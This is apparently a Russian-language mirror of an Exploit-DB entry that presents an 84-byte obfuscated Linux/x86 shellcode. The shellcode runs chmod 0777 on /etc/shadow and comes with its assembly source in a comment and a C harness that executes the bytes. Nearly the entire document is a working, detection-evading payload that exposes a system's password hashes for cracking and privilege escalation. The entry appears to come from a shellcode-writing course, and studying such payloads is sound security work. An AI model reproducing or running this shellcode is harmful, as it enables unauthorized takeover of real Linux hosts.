- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 36393
- Проверка EDB
-
- Пройдено
- Автор
- MAXIMILIANO GOMEZ VIDAL
- Тип уязвимости
- SHELLCODE
- Платформа
- LINUX_X86
- CVE
- N/A
- Дата публикации
- 2015-03-16
Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (84 bytes)
C:
/*
* Linux x86 - execve chmod 0777 /etc/shadow
* Obfuscated version - 84 bytes
* Original: http://shell-storm.org/shellcode/files/shellcode-828.php
* Author: xmgv
* Details: https://xmgv.wordpress.com/2015/03/13/slae-6-polymorphic-shellcode/
*/
/*
global _start
section .text
_start:
sub edx, edx
push edx
mov eax, 0xb33fb33f
sub eax, 0x3bd04ede
push eax
jmp short two
end:
int 0x80
four:
push edx
push esi
push ebp
push ebx
mov ecx, esp
push byte 0xc
pop eax
dec eax
jmp short end
three:
push edx
sub eax, 0x2c3d2dff
push eax
mov ebp, esp
push edx
add eax, 0x2d383638
push eax
sub eax, 0x013ffeff
push eax
sub eax, 0x3217d6d2
add eax, 0x31179798
push eax
mov ebx, esp
jmp short four
two:
sub eax, 0x0efc3532
push eax
sub eax, 0x04feca01
inc eax
push eax
mov esi, esp
jmp short three
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] =
"\x29\xd2\x52\xb8\x3f\xb3\x3f\xb3\x2d\xde\x4e\xd0\x3b\x50\xeb\x33\xcd\x80"
"\x52\x56\x55\x53\x89\xe1\x6a\x0c\x58\x48\xeb\xf2\x52\x2d\xff\x2d\x3d\x2c"
"\x50\x89\xe5\x52\x05\x38\x36\x38\x2d\x50\x2d\xff\xfe\x3f\x01\x50\x2d\xd2"
"\xd6\x17\x32\x05\x98\x97\x17\x31\x50\x89\xe3\xeb\xcf\x2d\x32\x35\xfc\x0e"
"\x50\x2d\x01\xca\xfe\x04\x40\x50\x89\xe6\xeb\xca";
int main() {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}- Источник
- www.exploit-db.com
